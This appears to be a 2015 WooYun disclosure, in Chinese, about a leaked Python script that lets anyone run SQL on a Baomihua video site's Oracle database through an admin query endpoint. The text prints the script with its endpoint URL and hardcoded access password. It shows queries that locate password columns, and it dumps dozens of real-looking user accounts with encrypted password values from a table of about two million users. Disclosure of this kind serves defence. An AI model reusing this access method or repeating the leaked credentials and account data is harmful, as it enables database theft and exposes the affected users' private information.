2015-05-26: 细节已通知厂商并且等待厂商处理中 2015-05-31: 厂商已经主动忽略漏洞,细节向公众公开
爆米花Oracle查询脚本泄露(202万用户可拖库)
之前在服务器上发现一个python脚本,没有来得及利用。今天看了下,通过查询接口,可以直接获取用户数据。
def __execute_main(sql, max_line):#主库 assert isinstance(sql,unicode) try: myprint(u'语句main:{0}'.format(sql)) payload = u'sqlCode={0}\r\nnum={1}\r\npsw={2}'.format(sql,max_line,'t34iofxnamby7vu6') payload=payload.encode('utf8') r = requests.post("http://pomoho.pxtadmin.com:8080/ajax/PmhManager.dbSearch,PmhManager.ashx?_method=GetResultList&_session=rw", data=payload, timeout=300) return r.text except: trace_info=traceback.format_exc() trace_info=trace_info.replace('\n','###') shell='start ""cmd echo "{0}"'.format(trace_info) myprint(shell) os.system(shell)
select banner from sys.v_$version where rownum=1
Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - 64bit Production
查询哪些表中有密码相关的列:select TABLE_NAME, COLUMN_NAME from all_tab_columns where COLUMN_NAME like '%PASS%'
[[u'TABLE_NAME', u'COLUMN_NAME', u'NUM'], [u'SMMSUSERS', u'PASSWORD', u'1'], [u'PMHNEWSUNIONMEMBERS', u'LOGINPASSWORD', u'2'], [u'SMMSCOOPSITES', u'PASSWORD', u'3'], [u'PMHUSERSHIS', u'LOGINPASSWORD', u'4'], [u'PMHOAUSER', u'U_PASSWORD', u'5'], [u'PMHUSERQUALITYSTAT', u'PASSVIDEOCOUNT', u'6'], [u'PUBUNIONOPERATOR', u'PASSWORD', u'7'], [u'PMH_CHANNELSTAT_DEVELOPMENT', u'FIRSTPASSCOUNT', u'8'], [u'PMH_CHANNELSTAT_DEVELOPMENT', u'FIRSTNOTPASSCOUNT', u'9'], [u'PMH_CHANNELSTAT_DEVELOPMENT', u'SECONDPASSCOUNT', u'10']]
数据量少的直接略过,查询PMHUSERSHIS,得到用户数202万:
测试取几十条数据(select LOGINACCOUNT,LOGINPASSWORD,EMAIL from PMHUSERSHIS where rownum < 100)
[[u'LOGINACCOUNT', u'LOGINPASSWORD', u'EMAIL', u'NUM'], [u'wei520920', u'2cMrE9ckotcMWPRdPkoCYA==', u'', u'1'], [u'mht6461', u'ZVEaLKRe1XdF2AOrF7kEZg==', u'', u'2'], [u'fly1683000', u'OnD8MMQE9sWcAKmT6SNpEw==', u'', u'3'], [u'lklklklk01', u'REuz9lfgAQ5PJPjUiIjGpg==', u'', u'4'], [u'mei880620', u'tNsd163GELyoVXYEApe6cA==', u'', u'5'], [u'xingni9920', u'0TdNpbjwcBnFhtwPdgRVHw==', u'', u'6'], [u'djs280677751', u'0vGRYsAGwvwAxImYb68tpw==', u'', u'7'], [u'zhangping972', u'ZiIaAhHEydVXvRS1uYjl9Q==', u'', u'8'], [u'JJ_wang', u'SreHilHcO3O4Z73BIxwspA==', u'', u'9'], [u'qazxc89757', u'zinyVakEf0dQbt0hreoK3w==', u'', u'10'], [u'fuyan109844385', u'BslSpTFBzDU33vCf37SzBw==', u'', u'11'], [u'boy888', u'qgsM0kJ+77s97CLen/Bt/Q==', u'', u'12'], [u'luDVD', u'ybgnhCO5pWxtybNO3WgzNQ==', u'', u'13'], [u'michaelchannel', u'1+PK4kckwQAShVRi9dUt0g==', u'', u'14'], [u'371413869', u'TBWIZ0jPHWi7Afr9ErVrlA==', u'', u'15'], [u'13186850716', u'62DY2xRCbyOGuQOJZv07Ig==', u'', u'16'], [u'395593700', u'XC6rM+c9B+zVSathuTfalw==', u'', u'17'], [u'BB\u9f99', u'ybgnhCO5pWxtybNO3WgzNQ==', u'', u'18'], [u'sunxiao0219', u'F2THG5E+Y6tFfhsepl1FjQ==', u'', u'19'], [u'qwertyuiop789', u'TcToBNxQatRL12fEbMPXVw==', u'', u'20'], [u'sunxiao0219', u'F2THG5E+Y6tFfhsepl1FjQ==', u'', u'21'], [u'sjx005', u'VR9B4WO5yo7+sfkbdZhyHg==', u'', u'22'], [u'liaixan', u'3V1UsTyr3UJPLnwCXzyXjQ==', u'', u'23'], [u'licaiyunqq', u'ex+40bdfxlyJTLLecNyt7A==', u'', u'24'], [u'vxiaodao', u'vxPF4peIKdC0D7zV+oLSDA==', u'', u'25'], [u'vxiaodao', u'vxPF4peIKdC0D7zV+oLSDA==', u'', u'26'], [u'467640954', u'TsOGq5m8lsf98BrXOc2T+A==', u'', u'27'], [u'jessica\u5409\u5409', u'O3O+6khkzL00UQvfzH9IsA==', u'', u'28'], [u'kiki498959581', u'gO609EgaNsCuNf7fFCwz/Q==', u'', u'29'], [u'bieguchaocai', u'ONe3on/Dsx+6X91+24JyhQ==', u'', u'30'], [u'bieguchaocai', u'ONe3on/Dsx+6X91+24JyhQ==', u'', u'31'], [u'3262205', u'FhUbxz5Xq3pnUL+wZLjLdQ==', u'', u'32'], [u'a52152168', u'Pj48GXAFyM3Gir53hxPCfQ==', u'', u'33'], [u'xiangcao', u'ybgnhCO5pWxtybNO3WgzNQ==', u'', u'34'], [u'laoshideenhui', u'ybgnhCO5pWxtybNO3WgzNQ==', u'', u'35'], [u'faishao', u'1mUVQvBDKPQ/Cz6kLI5aeg==', u'', u'36'], [u'neversaygoodbye', u'QG9wLUWIG6mIhYmw3RodWg==', u'', u'37'], [u'kiss52039442', u'b2cBYZpXr6LtZOdpbyVT6Q==', u'', u'38'], [u'0086uc', u'tIOsdN6RKqA94ZdZ0SpomA==', u'', u'39'],
不要把相关脚本直接放在服务器上。修改密码。
危害等级:无影响厂商忽略
忽略时间:2015-05-31 11:42
漏洞Rank:8 (WooYun评价)
暂无